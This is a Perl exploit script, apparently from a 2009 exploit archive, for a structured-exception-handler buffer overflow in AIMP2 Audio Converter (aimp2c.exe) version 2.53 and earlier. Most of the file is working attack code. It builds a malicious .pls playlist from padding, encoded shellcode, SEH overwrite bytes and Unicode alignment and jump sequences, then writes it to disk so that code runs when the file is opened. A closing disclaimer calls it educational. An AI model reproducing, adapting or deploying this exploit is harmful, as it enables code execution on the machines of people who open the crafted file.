# Exploit Title : AIMP2 Audio Converter Playlist (pls) BOF
# Discovered by : mr_me (http://milw0rm.com/exploits/9561)
# Author : corelanc0d3r
# Author contact : (corelanc0d3r[at]gmail[dot]com) | http://www.corelan.be:8800
# Date : nov 7th, 2009
# Type : local and remote code execution
# OS : Windows
# Product : AIMP2 Audio Converter (aimp2c.exe)
# Version : <= 2.53 build 330
# Software Link : http://download.softpedia.com/dl/fc4ba08d060d34b748131a14137f341e/4af5a079/100070491/software/multimedia/audio/aimp_2.51.330.zip
# -------------------------------------------------------------------------
# Method : SEH / Unicode
# Tested on : XP SP3 En (VirtualBox)
# Greetz&Tx to : DellNull/EdiStrosar/Rick2600/Phifli/SenatorStrange
# -------------------------------------------------------------------------
# Code
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
my $header = "[playlist]\nNumberOfEntries=1\n\n";
$header=$header."File1=";
my $junk="A" x 2017;
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARA".
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA".
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB".
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX".
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7".
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP".
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4".
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K".
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM".
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU".
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";
my $morejunk = "A" x (4065-length($junk.$shellcode));
my $seh="\x41\x6d";
my $nseh="\x0e\x45";
my $align = "\x58";
$align=$align."\x6d";
$align=$align."\x58";
$align=$align."\x6d";
$align=$align."\x58";
$align=$align."\x6d";
$align=$align."\x58";
$align=$align."\x6d";
$align = $align."\x05\x02\x22";
$align=$align."\x6d";
$align=$align."\x2d\x09\x11";
$align=$align."\x6d";
$align=$align."\x2d\x09\x11";
$align=$align."\x6d";
my $jump = "\x50";
$jump=$jump."\x6d";
$jump=$jump."\xc3";
my $rest = "A" x 1000;
my $payload=$header.$junk.$shellcode.$morejunk.$seh.$nseh.$align.$jump.$rest."\n";
open(myfile,'>aimp2sploit.pls');
print myfile $payload;
print "Wrote " . length($payload)." bytes to aimp2sploit.pls\n";
close(myfile);